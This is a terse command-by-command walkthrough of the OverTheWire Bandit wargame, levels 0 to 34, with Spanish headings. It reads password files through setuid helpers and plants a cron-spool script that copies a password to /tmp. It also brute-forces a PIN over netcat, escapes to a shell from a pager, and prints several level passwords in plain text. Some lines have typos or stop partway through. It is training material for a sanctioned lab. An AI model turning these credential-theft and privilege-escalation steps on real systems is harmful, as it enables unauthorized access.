=== Bandit ===

Nivel 0
$ ssh bandit0@bandit.labs.overthewire.org -p 2220
$ bandit0

Nivel 0 > Nivel 1
$ ls
$ cat readme

Nivel 1 > Nivel 2
$ ls 
$ cat ./-

Nivel 2 > Nivel 3
$ cat "spaces in this filename"

Nivel 3 > Nivel 4
$ ls
$ cd inhere
$ ls -a
$ cat .hidden


Nivel 4 > Nivel 5
$ ls 
$ cd inhere
$ ls -la
$ file ./*
$ cat ./-file07

Nivel 5 > Nivel 6
$ ls 
$ cd inhere
$ ls -la
$ ls -la maybehere00
$ file */{.,}* | grep "ASCII text" | grep -v ', with very long lines'
$ du -b -a | grep 1033
$ cat ./maybehere07/.file2

Nivel 6 > Nivel 7
$ ls -la
$ cat /var/lib/dpkg/info/bandit7.password

Nivel 7 > Nivel 8
$ ls
$ du -b data.txt
$ cat data.txt | grep millionth

Nivel 8 > Nivel 9
$ ls 
$ sort data.txt | uniq -u

Nivel 9 > Nivel 10
$ ls
$ strings data.txt | grep ===

Nivel 10 > Nivel 11
$ ls
$ cat data.txt
$ base64 -d data.txt

Nivel 11 > Nivel 12

$ ls 
$ cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Nivel 12 > Nivel 13
$ ls
$ cat data.txt
$ mkdir /tmp/wf1
$ cp data.txt /tmp/wf1/.
$ cd /tmp/wf1
$ ls
$ xxd -r data.txt data
$ file data
$ mv data data.gz
$ gzip -d data.gz
$ ls
$ file data
$ mv data data.bz2
$ bzip2 -d data.bz2
$ file data
$ mv data data.gz
$ gzip -d data.gz
$ file data
$ mv data data.tar
$ tar xvf data.tar
$ file data5.bin
$ mv data5.bin data.tar
$ tar xvf data.tar
$ file data6.bin
$ mv data6.bin data.bz2
$ bzip2 -d data.bz2
$ file data
$ mv data data.tar
$ tar xvf data.tar
$ file data8.bin
$ mv data8.bin data.gz
$ gzip -d data.gz
$ file data
$ cat data

Nivel 13 > Nivel 14
$ ls
$ ssh -i sshkey.private bandit14@localhost
$ ssh -i sshkey.private -p 2220 bandit14@localhost
$ ls /etc/bandit_pass/
$ cat /etc/bandit_pass/bandit14
$ fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq

Nivel 14 > Nivel 15
$ ls
$ nc localhost 30000
$ talnet localhost 30000

Nivel 15 > Nivel 16
$ ls
$ openssl s_client -connect localhost:30001

Nivel 16 > Nivel 17
$ nmap -A -p 31000-32000 localhost
$ echo "JQttfApK4SeyHwDlI9SXGR50qclOAil1" | openssl s_client -quiet -connect 
$ localhost:31790 -ign_eof
$ cd /tmp/random_sshkey
$ vim private.key
$ chmod 400 private.key
$ ls -l
$ ssh -i private.key -p 2220 bandit17@localhost

Nivel 17 > Nivel 18
$ ls
$ cat passwords.old 
$ cat passwords.new
$ diff passwords.old passwords.new

Nivel 18 > Nivel 19
$ ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat ~/readme"

Nivel 19 > Nivel 20
$ ls
$ file bandit20-do
$ ls -l
$ ./bandit20-do
$ ./bandit20-do cat /etc/bandit_pass/bandit20

Nivel 20 > Nivel 21
$ ls
$ ls -l
$ echo -n "VxCazJaVykI6W36BkBU0mJTCM8rR95XT" | nc -l -p 1234 &
$ ./suconnect 1234

Nivel 21 > Nivel 22
$ cd /etc/cron.d
$ ls
$ cat cronjob_bandit22
$ cat /usr/bin/cronjob_bandit22.sh
$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Nivel 22 > Nivel 23
$ ls /etc/cron.d/
$ cat /etc/cron.d/cronjob_bandit23
$ cat /usr/bin/cronjob_bandit23.sh
$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349

Nivel 23 > Nivel 24
$ ls /etc/cron.d
$ cat /etc/cron.d/cronjob_bandit24
$ cat /usr/bin/cronjob_bandit24.sh
$ mkdir pass
$ cd /tmp/passs
$ touch pass.sh
$ vi pass.sh
	#!/bin/bash
	cat /etc/bandit_pass/bandit24 > /tmp/ypass/pass
$ touch pass
$ chmod 777 -R /tmp/passs
$ cp pass.sh /var/spool/bandit24/foo
$ ls -l
$ ls -l
$ ls -l
$ cat pass

Nivel 24 > Nivel 25
$ nc localhost 30002
$ mkdir /tmp/bandit-pass25
$ cd /tmp/bandit-pass25
$ vi script.sh
#!/bin/bash

for a in {0..9}
do      
    for e in {0..9}
    do
	for i in {0..9}
	do
	   for o in {0..9}
	   do
		echo "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar $a$e$i$o"	   
	  done
	done
    done
done 
$ chmod +x script.sh
$ ls -l
$ ./script.sh | nc localhost 30002

Nivel 25 > Nivel 26
$ ls
$ ssh -i bandit26.sshkey bandit26@localhost -p 2220
$ modo more se hce pequeña la consola
$ :r cat /etc/bandit_pass/bandit26

Nivel 26 > Nivel 27
$ set shell=/bin/bash
$ :shell
$ ls
$ ./bandit27-do cat /etc/bandit_pass/bandit27

Nivel 27 > Nivel 28
$ mkdir /tmp/darkvoid
$ cd /tmp/darkvoid
$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
$ ls -l
$ cd repo
$ cat README

Nivel 28 > Nivel 29
$ mkdir /tmp/dark
$ cd /tmp/dark
$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
$ cd repo
$ ls -a
$ cat README.md
$ git branch
$ git log
$ git checkout abcff758fa6343a0d002a1c0add1ad8c71b88534
$ ls
$ cat README.md

Nivel 29 > Nivel 30
$ ls
$ mkdir /tmp/void29
$ cd /tmp/void29
$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
$ cd repo
$ ls -a
$ cat README.md
$ git branch -r
$ git checkout dev
$ ls
$ cat README.md


Nivel 30 > Nivel 31
$ mkdir /tmp/void30
$ cd /tmp/void30
$ git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo
$ ls
$ cd repo
$ ls -a
$ cat README.md
$ git branch -r
$ git tag
$ git show secret

Nivel 31 > Nivel 32
$ ls
$ cd repo
$ ls -a
$ rm .gitignore
$ echo 'May I come in?' > key.txt
$ git add key.txt
$ git branch

Nivel 32 > Nivel 33
$0
$export SHELL=/bin/bash
$ echo $SHELL
$SHELL
$ ls
$ cd /etc/bandit_pass
$ ls
$ cat bandit33

Nivel 33 > Nivel 34
$ cat README.txt
